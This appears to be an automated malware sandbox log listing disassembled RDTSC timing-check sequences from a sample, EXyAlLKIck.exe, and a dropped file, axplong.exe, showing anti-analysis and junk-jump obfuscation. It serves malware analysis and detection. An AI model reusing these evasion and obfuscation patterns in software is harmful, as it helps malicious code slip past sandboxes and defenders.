                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B07A7 second address: 50B07DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8F4A758h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B07DD second address: 50B07E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B07E3 second address: 50B07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B07F4 second address: 50B0819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB68h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0819 second address: 50B0871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE5B8F4A755h 0x00000012 or ax, A326h 0x00000017 jmp 00007FE5B8F4A751h 0x0000001c popfd 0x0000001d jmp 00007FE5B8F4A750h 0x00000022 popad 0x00000023 test esi, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0871 second address: 50B0875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0875 second address: 50B087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B087B second address: 50B0925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE62AC02651h 0x0000000f jmp 00007FE5B8D9CB60h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c jmp 00007FE5B8D9CB5Eh 0x00000021 pushfd 0x00000022 jmp 00007FE5B8D9CB62h 0x00000027 xor ecx, 194064B8h 0x0000002d jmp 00007FE5B8D9CB5Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ecx, esi 0x00000036 jmp 00007FE5B8D9CB66h 0x0000003b je 00007FE62AC025FCh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007FE5B8D9CB5Dh 0x00000049 call 00007FE5B8D9CB60h 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0925 second address: 50B092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B092B second address: 50B09AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 call 00007FE5B8D9CB64h 0x00000015 pop ebx 0x00000016 mov dh, cl 0x00000018 popad 0x00000019 jne 00007FE62AC025B9h 0x0000001f jmp 00007FE5B8D9CB69h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov ebx, 2173034Eh 0x0000002d popad 0x0000002e push ebx 0x0000002f jmp 00007FE5B8D9CB62h 0x00000034 mov dword ptr [esp], ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE5B8D9CB67h 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09AB second address: 50B09B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09B1 second address: 50B09D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB66h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09D4 second address: 50B09D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09D8 second address: 50B09DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09DE second address: 50B09EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A4C second address: 50B0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A52 second address: 50B0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A56 second address: 50B0A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE5B8D9CB5Bh 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Bh 0x00000019 and cl, FFFFFFEEh 0x0000001c jmp 00007FE5B8D9CB69h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A9C second address: 50B0AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A756h 0x0000000b xor al, FFFFFF98h 0x0000000e jmp 00007FE5B8F4A74Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE5B8F4A755h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0D5E second address: 50C0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB5Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Ch 0x00000019 sub cx, 5BB8h 0x0000001e jmp 00007FE5B8D9CB5Bh 0x00000023 popfd 0x00000024 push esi 0x00000025 pop edx 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DA7 second address: 50C0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DAD second address: 50C0DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DB1 second address: 50C0DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0A96 second address: 50C0B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB66h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE5B8D9CB5Eh 0x00000018 add cl, FFFFFFF8h 0x0000001b jmp 00007FE5B8D9CB5Bh 0x00000020 popfd 0x00000021 call 00007FE5B8D9CB68h 0x00000026 pushfd 0x00000027 jmp 00007FE5B8D9CB62h 0x0000002c jmp 00007FE5B8D9CB65h 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE5B8D9CB5Ah 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0B2D second address: 50C0B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0B33 second address: 50C0B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140820 second address: 5140824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140824 second address: 5140828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140828 second address: 514082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514082E second address: 514083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514083D second address: 5140853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8F4A74Bh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140853 second address: 514086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB64h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514086B second address: 514086F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514086F second address: 51408D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE5B8D9CB5Dh 0x00000010 add al, 00000066h 0x00000013 jmp 00007FE5B8D9CB61h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FE5B8D9CB60h 0x0000001f adc cx, 9808h 0x00000024 jmp 00007FE5B8D9CB5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE5B8D9CB60h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408D5 second address: 51408DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408DB second address: 51408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408E1 second address: 51408E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130913 second address: 5130919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130B98 second address: 5130B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130B9C second address: 5130BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130BA2 second address: 5130BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FE5B8F4A753h 0x00000016 sbb ecx, 68B30D8Eh 0x0000001c jmp 00007FE5B8F4A759h 0x00000021 popfd 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CDB second address: 5130CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CDF second address: 5130CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CEE second address: 5130CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CF4 second address: 5130CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A32C second address: 96A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A330 second address: 96A334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885C73 second address: 885C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B7E4 second address: 87B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B7EA second address: 87B80A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB62h 0x0000000d jc 00007FE5B8D9CB56h 0x00000013 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B80A second address: 87B80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B80E second address: 87B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE5B8D9CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885045 second address: 885064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FE5B8F4A752h 0x0000000b js 00007FE5B8F4A746h 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885064 second address: 885078 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8D9CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88537A second address: 88538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88538A second address: 885393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885393 second address: 8853AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE5B8F4A746h 0x00000014 jo 00007FE5B8F4A746h 0x0000001a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8853AD second address: 8853C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88551C second address: 88553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE5B8F4A746h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE5B8F4A74Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88553B second address: 88555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE5B8D9CB68h 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887978 second address: 887982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE5B8F4A746h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887982 second address: 887986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887A07 second address: 887A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, eax 0x0000000a push 00000000h 0x0000000c mov edi, ebx 0x0000000e push 30A59EDFh 0x00000013 jmp 00007FE5B8F4A754h 0x00000018 xor dword ptr [esp], 30A59E5Fh 0x0000001f adc dx, 377Ah 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FE5B8F4A748h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FE5B8F4A748h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000003h 0x0000005e mov di, 44B1h 0x00000062 push 8CDCC9A9h 0x00000067 pushad 0x00000068 jnp 00007FE5B8F4A748h 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007FE5B8F4A746h 0x00000076 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887A9F second address: 887AF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 33233657h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE5B8D9CB58h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3603h], ecx 0x00000032 lea ebx, dword ptr [ebp+1244C89Fh] 0x00000038 mov si, 1805h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 jmp 00007FE5B8D9CB5Ah 0x00000045 pop ebx 0x00000046 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887C67 second address: 887C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887C83 second address: 887CAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE5B8D9CB5Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887CAE second address: 887CB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06C6 second address: 50E06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06CC second address: 50E06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06DD second address: 50E0709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE5B8D9CB5Dh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0709 second address: 50E070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E070F second address: 50E0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FE5B8D9CB64h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FE5B8D9CB60h 0x00000016 sub esp, 1Ch 0x00000019 pushad 0x0000001a mov edx, esi 0x0000001c mov eax, 251A6549h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FE5B8D9CB61h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0762 second address: 50E0767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0767 second address: 50E07AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB69h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Dh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07AC second address: 50E07DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8F4A758h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07DE second address: 50E07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07E2 second address: 50E07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07E8 second address: 50E080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB5Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, esi 0x00000018 rdtsc
